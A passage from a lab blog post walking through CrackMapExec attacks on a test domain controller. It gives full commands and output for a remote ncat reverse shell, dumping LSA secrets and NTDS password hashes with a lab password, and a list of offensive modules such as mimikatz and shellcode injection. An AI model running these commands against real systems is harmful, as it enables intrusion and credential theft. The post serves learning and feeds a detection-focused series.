CME          10.0.0.105:445 SECNIK-2K19     1 File(s)      1,667,584 bytes
CME          10.0.0.105:445 SECNIK-2K19     0 Dir(s)  31,757,164,544 bytes free
[*] KTHXBYE!

We can also confirm the file was downloaded by looking at the output from Python's SimpleHTTPServer


root@securitynik:/usr/share/ncat-w32# python -m SimpleHTTPServer 443
Serving HTTP on 0.0.0.0 port 443 ...
10.0.0.100 - - [03/Apr/2019 22:20:47] "GET / HTTP/1.1" 200 -
10.0.0.100 - - [03/Apr/2019 22:20:47] code 404, message File not found
10.0.0.100 - - [03/Apr/2019 22:20:47] "GET /favicon.ico HTTP/1.1" 404 -
10.0.0.105 - - [03/Apr/2019 22:29:32] "GET /ncat.exe HTTP/1.1" 200 -

Nice!! Let's wrap up this "ncat.exe" portion by getting a reverse shell to be sent to us from the domain controller which we just uploaded the "ncat.exe" to. Let's first setup our listener on our Kali (attacking machine). We will use port 443 which is typically encrypted. However, in this case we will not encrypt the traffic as in another post we will look at the packet analysis of all this activity.

Here is our "ncat" listener on our attacking machine. As you may notice below, it is listening on both IPv4 (0.0.0.0:443)  and IPv6 (:::443).


root@securitynik:/cme# ncat --verbose --listen 443 --keep-open --max-conns 1 --nodns
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443

Now let's execute "ncat.exe" on the remote domain controller via CrackMapExec


root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 -x "c:\tools\ncat.exe --nodns --exec cmd.exe 10.0.0.100 443" --exec-method smbexec
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
[*] KTHXBYE!

Now it's time to test if we were able to successfully execute "ncat.exe" on the remote device. If we did, we should now have a shell on our attacking machine. Let's see if we were blessed with a shell.

root@securitynik:~/cme# ncat --verbose --listen 443 --keep-open --max-conns 1 --nodns
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.0.0.105.
Ncat: Connection from 10.0.0.105:50602.
Microsoft Windows [Version 10.0.17763.253]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\>whoami
whoami
securitynik\administrator

C:\>net users
net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    krbtgt                   
nakia                    neysa                    nik                      
Prague                   saadia                   securitynik              
The command completed with one or more errors.


C:\>exit

What do you know, we see above we have a shell with system level privileges. Obviously, now that we have this access we can go crazy. However, I will leave it here as I'm still trying to learn more about CrackMapExec. Considering the above, we could have even configured a schedule tasks to ensure the shell is sent to us on a daily basis at a certain time.

Let's move on to something different. Let's first look at grabbing credentials from the LSA process.

root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 --lsa
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME          10.0.0.105:445 SECNIK-2K19     [+] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
CME          10.0.0.105:445 SECNIK-2K19     [+] Dumping LSA Secrets
CME          10.0.0.105:445 SECNIK-2K19     SECURITYNIK\SECNIK-2K19$:aad3b435b51404eeaad3b435b51404ee:7683fb6c93f423dddeaab188cec6c4d7:::
CME          10.0.0.105:445 SECNIK-2K19     DPAPI_SYSTEM:010000004cfe7f1570df81dc0106e97aa01a607494b3b79a2c6c1d5c51fa01f8dcfee4433a922b2cc3e661aa
CME          10.0.0.105:445 SECNIK-2K19     NL$KM:4464bf81f673d67d247f4b7154892396524ee8d8605a42bbbc54901af2b62beb606815c92c17f71ecf7fbe14a476e0d9ca3f27570a51b2a9c8457664842d9094
[*] KTHXBYE!


Let's go further with credentials and see if we can dump the NTDS database. It seems, we have two methods to achieve this. The first is leveraging volume shadow copy (VSS) or DRSUAPI. The DRSUAPI is the faster and recommended method for this tool.

Since I've used other tools such as Metasploit in my book (Learning By Practicing - Hack & Detect: Leveraging the Cyber Kill Chain for Practical Hacking and its Detection via Network Forensics) to grab credentials from AD via VSS, I will try this DRSUAPI method.

On a side note, drsuapi is a protocol which is used to implement the Directory Replication Services (DRS) Remote Protocol. Think Active Diretory with multiple domain controllers needing to replicate data so all Domains Controllers are in sync and up-to-date.

Now that we are aware of what DRSUAPI is, let's get back to dumping


root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 --ntds drsuapi
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME          10.0.0.105:445 SECNIK-2K19     [+] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
CME          10.0.0.105:445 SECNIK-2K19     [+] Using the DRSUAPI method to get NTDS.DIT secrets
CME          10.0.0.105:445 SECNIK-2K19     Administrator:500:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026:::
CME          10.0.0.105:445 SECNIK-2K19     Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CME          10.0.0.105:445 SECNIK-2K19     krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c82d13d85e7f4d04b8614295063c1e28:::
CME          10.0.0.105:445 SECNIK-2K19     securitynik.local\nakia:1103:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026:::
CME          10.0.0.105:445 SECNIK-2K19     securitynik.local\neysa:1104:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026:::
CME          10.0.0.105:445 SECNIK-2K19     securitynik.local\securitynik:1105:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026:::
CME          10.0.0.105:445 SECNIK-2K19     securitynik.local\saadia:1106:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026:::
CME          10.0.0.105:445 SECNIK-2K19     securitynik.local\nik:1107:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026:::
CME          10.0.0.105:445 SECNIK-2K19     Prague:1110:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026:::
CME          10.0.0.105:445 SECNIK-2K19     SECNIK-2K19$:1000:aad3b435b51404eeaad3b435b51404ee:7683fb6c93f423dddeaab188cec6c4d7:::


Before we close this out, let's take a look at some of the available modules:


root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 --list-modules
[*] empire_exec          Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
[*] mimikittenz          Executes Mimikittenz
[*] rundll32_exec        Executes a command using rundll32 and Windows's native javascript interpreter
[*] shellinject          Downloads the specified raw shellcode and injects it into memory using PowerSploit's Invoke-Shellcode.ps1 script
[*] com_exec             Executes a command using a COM scriptlet to bypass whitelisting
[*] enum_chrome          Uses Powersploit's Invoke-Mimikatz.ps1 script to decrypt saved Chrome passwords
[*] tokens               Enumerates available tokens using Powersploit's Invoke-TokenManipulation
[*] mimikatz             Executes PowerSploit's Invoke-Mimikatz.ps1 script
[*] powerview            Wrapper for PowerView's functions
[*] peinject             Downloads the specified DLL/EXE and injects it into memory using PowerSploit's Invoke-ReflectivePEInjection.ps1 script
[*] tokenrider           Allows for automatic token enumeration, impersonation and mass lateral spread using privileges instead of dumped credentials
[*] metinject            Downloads the Meterpreter stager and injects it into memory using PowerSploit's Invoke-Shellcode.ps1 script
[*] eventvwr_bypass      Executes a command using the eventvwr.exe fileless UAC bypass


This post is already a bit longer than I had planned. In another post I will look into using some of the other modules

References:
https://ptestmethod.readthedocs.io/en/latest/cme.html
https://www.securenetworkinc.com/news/2017/8/22/crackmapexec-the-greatest-tool-youve-never-heard-of
https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html
https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec-cheatsheet/
https://offensivesec.blogspot.com/2016/01/crackmapexec-swiss-army-knife-for_92.html
https://www.n00py.io/2017/10/detecting-crackmapexec-cme-with-bro-sysmon-and-powershell-logs/
https://github.com/byt3bl33d3r/CrackMapExec/wiki/Using-Credentials
https://nmap.org/ncat/guide/ncat-ssl.html
https://wiki.samba.org/index.php/DRSUAPI
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/58f33216-d9f1-43bf-a183-87e3c899c410
https://www.samba.org/~metze/presentations/2007/metze_sambaxp2007_drsuapi_repl.pdf
https://adsecurity.org/?p=1729
https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell
https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/
https://adsecurity.org/?p=1760
https://adsecurity.org/?page_id=1821
https://alpymarinos.wordpress.com/2016/01/06/mimikatz/
https://blog.nviso.be/2018/01/09/windows-credential-guard-mimikatz/


Posts in this series:
Having Fun with CrackMapExec
Having Fun with CrackMapExec - Log Analysis
Having Fun with CrackMapExec - Packet Analysis - CrackMapExec
Having Fun with CrackMapExec - Zeek (Bro) Analysis
Having Fun with CrackMapExec - Snort IDS/IPS Analysis

No comments:

Post a Comment